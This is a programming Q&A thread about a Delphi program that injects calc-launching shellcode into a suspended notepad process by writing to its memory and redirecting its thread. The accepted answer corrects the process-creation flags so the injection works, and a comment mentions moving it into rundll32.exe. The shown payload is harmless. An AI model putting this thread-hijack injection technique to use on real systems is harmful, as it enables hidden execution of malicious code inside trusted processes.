# Delphi code Injection

Tags: delphi, code-injection

Everything seems to be working fine but my code does nothing.
I want to inject shellcode, which starts calc to notepad.

Here is my code:

```
const
  shellcode:array[0..124] of BYTE = ( // exec of calc.exe
  $fc,$e8,$44,$00,$00,$00,$8b,$45,$3c,$8b,$7c,$05,$78,$01,$ef,$8b,
  $4f,$18,$8b,$5f,$20,$01,$eb,$49,$8b,$34,$8b,$01,$ee,$31,$c0,$99, 
  $ac,$84,$c0,$74,$07,$c1,$ca,$0d,$01,$c2,$eb,$f4,$3b,$54,$24,$04,
  $75,$e5,$8b,$5f,$24,$01,$eb,$66,$8b,$0c,$4b,$8b,$5f,$1c,$01,$eb,
  $8b,$1c,$8b,$01,$eb,$89,$5c,$24,$04,$c3,$5f,$31,$f6,$60,$56,$64, 
  $8b,$46,$30,$8b,$40,$0c,$8b,$70,$1c,$ad,$8b,$68,$08,$89,$f8,$83,
  $c0,$6a,$50,$68,$7e,$d8,$e2,$73,$68,$98,$fe,$8a,$0e,$57,$ff,$e7,
  $63,$61,$6c,$63,$2e,$65,$78,$65,$00,$00,$00,$00,$00);

var 
  pi: TProcessInformation;
  si: TStartupInfo;
  ctx: Context;
  remote_shellcodePtr: Pointer;
  Written:Cardinal;

procedure TForm1.Button1Click(Sender: TObject);
begin
  FillMemory( @si, sizeof( si ), 0 );
  FillMemory( @pi, sizeof( pi ), 0 );

  CreateProcess(
    Nil,
    PChar( 'notepad.exe' ),
    Nil, Nil, False,
    NORMAL_PRIORITY_CLASS, Nil, Nil,                      //    NORMAL_PRIORITY_CLASS
    si, pi );

  ctx.ContextFlags := CONTEXT_CONTROL;
  GetThreadContext(pi.hThread,ctx);

  remote_shellcodePtr:=VirtualAllocEx(pi.hProcess,Nil,SizeOf(shellcode),MEM_COMMIT,
    PAGE_EXECUTE_READWRITE);

  WriteProcessMemory(pi.hProcess,remote_shellcodePtr,@shellcode,
  Sizeof(shellcode),written);
  ctx.Eip:=Integer(remote_shellcodePtr);
  ctx.ContextFlags := CONTEXT_CONTROL;
  SetThreadContext(pi.hThread,ctx);

  ResumeThread(pi.hThread);
end;
```

Maybe is problem in CreateProcess. The security settings can be CREATE_SUSPENDED|IDLE_PRIORITY_CLASS.
But that tells me that it is undefined.

Comment: I'm not sure what your question is here, but I'm guessing it's the part "that say me that is undefined". It helps when you get an error to post the **exact** error message - you have that information right in front of you, so there's no reason not to include it in your question so we have it as well. (If that's not the problem you're having, then please [edit] your question and be more clear about what you're asking.)

Comment: Always check the results of Windows API functions. You will thank yourself later.

Comment: What is your question?

Answer (score 1, accepted):

`IDLE_PRIORITY_CLASS` and `CREATE_SUSPENDED` are defined in the Windows unit. To use both of them together, you `or` them together.

As David points out in the comments, the second parameter to `CreateProcess` needs to be modifiable, so you can't pass a constant to it, but instead should assign to a local variable, call `UniqueString` on that variable, and then use it instead:

```
var
  AppToLaunch: string;
begin
  AppToLaunch := 'notepad.exe';
  UniqueString(AppToLaunch);

  CreateProcess(nil, PChar(AppToLaunch), nil, nil, False,
                IDLE_PRIORITY_CLASS or CREATE_SUSPENDED,
                nil, nil,  si, pi );
```

Comment: Thank you very much,but also i have to change notepad.exe to rundll32.exe.

Comment: @kiss so go ahead and do that

Comment: @ken second parameter to CreateProcess needs to be modifiable. Don't pass a literal, stored in read only memory. Assign to local var and call UniqueString on it.

Comment: You're right, David. I just copied the poster's code and made the change needed to it to answer the question, instead of looking at the other parameters. Fixed, and thanks.